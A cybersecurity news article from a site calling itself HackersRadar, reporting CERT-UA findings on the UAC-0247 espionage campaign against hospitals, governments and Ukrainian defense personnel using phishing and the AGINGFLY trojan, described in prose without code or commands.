Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
India Halts WhatsApp Usernames Rollout Due to Fraud Concerns
July 1, 2026
Critical Cursor IDE RCE Vulnerabilities Allow Zero-Click Prompt Injection
July 1, 2026
Automated Password Spray Attacks Target Microsoft Azure CLI
July 1, 2026
Home/Threats/UAC-0247 Attacks Hospitals, Governments to Steal Browser, WhatsApp Data
Threats

UAC-0247 Attacks Hospitals, Governments to Steal Browser, WhatsApp Data

Key Takeaways The threat group UAC-0247 has been observed since early 2026, targeting government entities and hospitals, as well as Ukrainian defense personnel. The attackers employ sophisticated...

Jennifer sherman
Jennifer sherman
April 16, 2026 2 Min Read
29 0

Key Takeaways

  • The threat group UAC-0247 has been observed since early 2026, targeting government entities and hospitals, as well as Ukrainian defense personnel.
  • The attackers employ sophisticated spear-phishing tactics, often leveraging themes of humanitarian aid or software updates, to deliver malware.
  • The primary objective is the exfiltration of sensitive data from web browsers and WhatsApp, alongside extensive network reconnaissance.
  • A key component of their arsenal is the AGINGFLY remote access trojan, which dynamically compiles command handlers on infected systems.

UAC-0247 Targets Critical Sectors with Advanced Data Theft Campaign

A persistent threat cluster, identified as UAC-0247, has been actively engaged in cyber espionage since early 2026, according to a detailed report. This group has systematically targeted critical infrastructure, including government agencies and hospitals, with a focus on stealing sensitive data from internet browsers and WhatsApp applications. Beyond data exfiltration, UAC-0247 demonstrates a capability for lateral movement and network expansion within compromised environments, as documented in a comprehensive analysis here.

Table Of Content

  • Key Takeaways
  • UAC-0247 Targets Critical Sectors with Advanced Data Theft Campaign
  • Initial Infiltration Tactics

Initial Infiltration Tactics

The campaign typically initiates with highly deceptive spear-phishing emails. These messages are crafted to appear as discussions about humanitarian aid, urging recipients to click on a malicious link. To enhance credibility, attackers either construct convincing fake websites using AI tools or redirect victims to legitimate third-party sites hosting Cross-Site Scripting (XSS) vulnerabilities. Upon clicking the link, a malicious archive file is downloaded to the target’s system. Opening this archive executes a shortcut file, which then leverages the standard HTA file processing utility to retrieve and run a remote HTA file. This process often includes a decoy form to distract the user while, in the background, an executable file is dropped and launched via a scheduled task. Further details on this mechanism are available here.

Analysts at CERT-UA have extensively documented this activity, noting a surge in attacks during March and April 2026. The same group has also broadened its scope to include Ukrainian Defense Forces personnel and FPV drone operators. A notable incident on March 10, 2026, involved the distribution of “bachu.zip” via the Signal messenger, masquerading as an update for the “BACHU” software used by FPV operators. This archive contained a DLL file designed to launch the AGINGFLY malware through a DLL side-loading technique upon execution of the primary program. More information can be found in the linked report <a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/afd78249-0a3f-48c9-b1f7-e4105adec086/New-UAC-0247-Campaign-Steals-Browser-and-WhatsApp-Data-From-Hospitals-and-Governments.pdf?AWSAccessKeyId=ASIA2F3EMEYE2XIWZKIP&Signature=ZB%2B8Q6XD1aSvrlil0XjbtFJhNs%3D&x-amz-

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackMalwarePatchThreatVulnerability

Share Article

Jennifer sherman

Jennifer sherman

Jennifer is a cybersecurity news reporter covering data breaches, ransomware campaigns, and dark web markets. With a background in incident response, Jennifer provides unique insights into how organizations respond to cyber attacks and the evolving tactics of threat actors. Her reporting has covered major breaches affecting millions of users and has helped organizations understand emerging threats. Jennifer combines technical knowledge with investigative journalism to deliver in-depth coverage of cybersecurity incidents.

Previous Post

McGraw Hill Data Breach Exposes 13.5 Million Users’ Personal Information

Next Post

US Nationals Sentenced for Operating Laptop Farm for North Korean IT Workers

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Fluentd Vulnerabilities Allow Remote Code Execution
July 1, 2026
Weaponized Google Ads Install Malicious Claude Code to Hijack macOS
July 1, 2026
Critical Adobe ColdFusion Vulnerabilities Let Attackers Run Code
July 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us